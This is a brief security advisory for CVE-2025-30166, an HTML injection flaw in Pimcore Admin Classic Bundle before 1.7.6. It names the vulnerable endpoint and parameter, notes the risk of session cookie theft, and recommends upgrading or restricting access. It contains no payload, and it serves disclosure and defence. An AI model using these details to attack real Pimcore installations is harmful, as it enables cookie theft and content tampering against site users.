CVE-2025-30166

Name of the Vulnerable Software and Affected Versions: Pimcore Admin Classic Bundle versions prior to 1.7.6

Description: An HTML injection issue in Pimcore's Admin Classic Bundle allows users with access to the email sending functionality to inject arbitrary HTML code into emails sent via the admin interface. This could potentially lead to session cookie theft and the alteration of page content. The issue is specifically found in the "/admin/email/send-test-email" endpoint using the POST method, where the content parameter permits the injection of arbitrary HTML code. Although JavaScript code injection is blocked, HTML code injection remains possible.

Recommendations: For versions prior to 1.7.6, update to version 1.7.6 to resolve the issue. As a temporary workaround, consider restricting access to the "/admin/email/send-test-email" endpoint or limiting the use of the content parameter to minimize the risk of exploitation.